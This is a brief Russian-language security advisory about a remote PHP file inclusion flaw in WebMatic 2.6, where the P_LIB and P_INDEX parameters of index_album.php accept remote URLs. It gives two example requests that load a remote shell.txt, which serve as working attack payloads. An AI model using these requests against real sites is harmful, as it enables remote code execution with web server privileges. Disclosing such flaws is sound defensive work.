Программа: WebMatic 2.6

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах «P_LIB» и «P_INDEX» сценарием index_album.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

[Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

[Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



Оставить мнение